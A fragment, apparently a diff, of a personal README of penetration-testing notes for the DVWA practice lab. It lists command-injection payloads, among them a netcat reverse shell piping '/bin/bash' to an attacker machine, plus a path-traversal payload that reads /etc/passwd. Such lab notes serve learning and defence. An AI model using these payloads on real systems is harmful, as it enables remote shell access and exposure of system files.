YoussefAmrRagab/CyberSecurity/README.md

 - To show the list of files and directories: `| ls -la`
 - First run in terminal: `nc -lvp <port>`
 - To connect remotely with the kali-Linux using netcat nc in DVWA: `| nc <kali_ip> <port> -e /bin/bash`

+# File Inclusion:

+<h3>low/medium security level</h3>

+- To run a local file inclusion `/etc/passwd` and see the content of it: `/../../../../../etc/passwd`